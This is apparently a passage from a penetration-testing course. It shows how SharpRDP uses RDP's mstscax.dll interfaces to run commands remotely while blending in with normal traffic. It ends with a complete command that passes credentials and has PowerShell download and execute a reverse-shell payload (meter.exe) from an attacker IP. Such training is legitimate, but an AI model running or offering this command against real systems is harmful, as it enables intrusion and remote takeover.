Although RDP is most often associated with the mstsc GUI client, it can also be used as a command-line tool. This technique reduces our overhead while still relying on the RDP protocol, which will often blend in well with typical network traffic.

The RDP application (mstsc.exe) builds upon the terminal services library mstscax.dll. This library exposes interfaces to both scripts and compiled code through COM objects.

SharpRDP is a C# application that uses uses the non-scriptable interfaces exposed by mstscax.dll to perform authentication in the same way as mstsc.exe.

Once authentication is performed, SharpRDP allows us to execute code through SendKeys. In this manner, no GUI access is required and setting up a reverse tunnel is unnecessary.

To demonstrate this, we’ll use the pre-compiled version of SharpRDP. We’ll specify the computername, username, and password along with the command to be executed. In this example, we’ll simply execute a reverse TCP shell using powershell:

sharprdp.exe computername=appsrv01 command="powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.49.69/meter.exe','C:\Windows\Tasks\meter.exe'); C:\Windows\Tasks\meter.exe" username=corp1\dave password=lab